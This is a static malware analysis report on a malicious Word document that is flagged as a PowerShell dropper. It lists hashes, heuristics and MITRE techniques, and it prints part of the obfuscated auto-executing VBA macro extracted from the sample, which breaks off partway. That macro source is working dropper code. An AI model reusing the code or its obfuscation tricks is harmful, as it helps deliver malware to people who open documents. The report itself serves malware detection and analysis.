Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f423b8bebb1e71d7…

MALICIOUS

Office (OLE)

Size: 85.5 KB
Created: 2018-08-28 06:22:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 7398023a479ca77e4c33509cb5f23423
SHA-1: 2ee250fe885b515617537e4c67f972457b419192
SHA-256: f423b8bebb1e71d7d8dae1ad6afdc93242c88b1a9d5f86f98fc4ff3d31cb53da
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicated by the OLE_VBA_SHELL heuristic, and is flagged as an auto-executing macro (AutoOpen). The ClamAV detection name 'Doc.Dropper.Powload-6665575-0' suggests it acts as a dropper for a PowerShell payload. The macro's obfuscated string concatenation likely reconstructs a command to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Powload-6665575-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6665575-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10417 bytes
SHA-256: 3a4f2b5197ad6f8b47798091dd4a5987e6eed1c1ff78c66e06f9258456ee6942

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HmKVOZRlvJw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pffPRGhYozs"
Function triVjoPnY()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error 61325 / fNizz
   Error 79705 * ELkFOb / 37199 / NDYnFR
   Error rCzDO * PnBwBO
rYZBEHzWkmf = "M" + "D /v^:^" + "O " + " /R  " + Chr(2 + 0 + 5 + 2 + 25) + "  ^s^e" + "^" + "T ^  ^" + " ^ H^"
Error nXITif * KSWcoB
UWJInWJTrt = "D^u^o==" + "AAIAA" + "CAg" + "^AA^I^A" + "ACAg^AA" + "^IA^" + "AC^A^g" + "AA^I" + "A" + "AC^A^gA" + "AI^"
Error XmApw * VPQjj
   Error JrRWUG * NYBbd / 2955 * DzwrAS
   Error AEntf * 50499 / 7776 * LiXjd
JBZRbu = "A^ACA^" + "gAAIAA" + "C^A9B^" + "Q^" + "fAs" + "^H^A" + "o" + "^B^wYA" + "^QH^" + "AhBw^" + "Y^" + "A^0HA7"
Error VioMLH * FVXZGY / MdEar / rDwCR
XwXimJJFw = "A^" + "waA" + "EGAl" + "Bgc^AI" + "^" + "G" + "A" + "7^A^wc^" + "AQ^F^" + "A^" + "y^" + "B^AJA^"
Error scUiTw / oftNGv
   Error 12193 / bmihj / wraaD / lmuDc
uRPmhOlXjfN = "ACAt" + "^B^" + "QZAQHA" + "^J^BQL" + "A" + "^U^GA" + "r" + "^B" + "w^bA" + "YH" + "A^"
Error 85560 * vmcWY / 96722 * NkTwz
   Error IIjjlz / zCbpHT * 36344 * 81881
   Error 85945 / sVFLCG / Ojotf / lfOuwP
   Error CLLPl / 58623 / HGUuLP / iJiLa
   Error fdzrij / EttdCs / 97732 * iuhNC
UKUErUwnwM = "u^B^QS^" + "A^" + "s^DAp" + "^AwcA^Q" + "F^" + "AyBA^J" + "A^" + "AC" + "^" + "As^A^w" + "^b^A^8^"
Error iislFR * ztdUQc / 52591 * 11512
   Error EUWjEu / CPwnG
   Error MYcRHn / hNDXI
zJmvEuSPk = "G^" + "A^pB^" + "AJ^A" + "gCAlBA" + "^b^A^" + "k^G^" + "A^GBAZ^" + "A^E^GAv" + "^B^A^" + "bA4G^" + "A^3^"
Error wOBXid / 71873 * KbucEr * NpaoP
   Error 29201 * VkjLTV * 22853 / 10390
   Error uBAMJ / diAjk
fFVAsjmlwoz = "B" + "wbAQE" + "A^u^A^w" + "^U^A^" + "QG" + "^A6B^A"
Error 36898 * BlzfS
   Error 40088 / UHWVW
   Error 89295 * ritwIs
   Error 77582 / UzWVTb * jaNrH * YrFqdv
DzGSDBYilNt = "^J^AsH" + "A5Bgc" + "^" + "A^" + "QH^A7^B" + "^Q" + "KAc^" + "H^Ap" + "^BA" + "c" + "AQCAgA"
Error 83971 / BfiwaL * cusppT / zfIoc
   Error 37630 / zFwXzF
bajApJLOcn = "^g" + "b^Ak" + "GAg^Aw^" + "bA" + "^8GAp^B" + "A^JA^" + "gC" + "^A" + "^o^" + "B^" + "wY^A^E^"
Error 83390 * lEZOKv
XnLKCALrUIS = "G^A^l" + "^B" + "gcA^8" + "G^AmB" + "^w^O^" + "AcC"
Error fzofZ * uZqNZ * 72985 / 43817
   Error 1641 * EPojU * jtEoi * aZVFj
   Error 47900 / YzDLcZ
BUHGIbvK = "A" + "l" + "^" + "B^Ae^" + "A^UG" + "^AuA"
triVjoPnY = rYZBEHzWkmf + UWJInWJTrt + JBZRbu + XwXimJJFw + uRPmhOlXjfN + UKUErUwnwM + zJmvEuSPk + fFVAsjmlwoz + DzGSDBYilNt + bajApJLOcn + XnLKCALrUIS + BUHGIbvK
   Error 33734 / OjAilz * WnFYn / VlGpV
End Function
Function FzvlhpU()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error 45394 / GwMSjW * 79643 / nAiPbX
   Error GXHEkz / rGXwww
AraDr = "w^JA" + "sC^" + "A^q^Bg" + "^Q^Ao" + "G^A" + "k^A" + "wKAcC^A"
Error 93879 / FULLX
   Error 75844 / ovpEGY
   Error 75584 / XQrtFE
   Error BSpmlS * BBnwq
   Error 1111 / KYijB
GSRtMmKuUjw = "cB" + "w^J" + "^A^" + "s" + "CAj^B" + "^Q" + "a^A^w" + "^G^" + "A^" + "i" + "^B^Q^d"
Error 88328 * aDPqG
   Error tOZzhi * mPGZmm / vANYr / RhfiQ
   Error duuSO * HaJmYu
   Error mOlBr / NOcNmj
RFLHPi = "A^A^" + "H^A^6A" + "g^dA" + "4G^A^l^" + "B"
Error iJDmin * WbrOj
   Error zjGtHt * DBROfh
FfZWKtEOYf = "A^J^A0" + "^DA^z" + "B^A" + "VA^IH" + "A"
Error TmItGi * IGhGbj
   Error iURNEG * mHwzY
   Error JHzaj * bWFTEi / lYzFJ * jJuREm
oFiwX = "^k^A" + "w^O" + "^" + "Ac" + "CA3A^" + "g" + "^M^A" + "Y^D^An" + "^A" + "^AI^A0D" + "^Ag^Ag" + "^aAIEA" + "q^B^"
Error wIZzQ * Itpkp / Pqtot * IkzZw
OaBmZUskTR = "A^J^AsD" + "ApA^w" + "^J" + "^" + "A^A^E^A" + "nAA" + "K^A^Q^H" + "
... (truncated)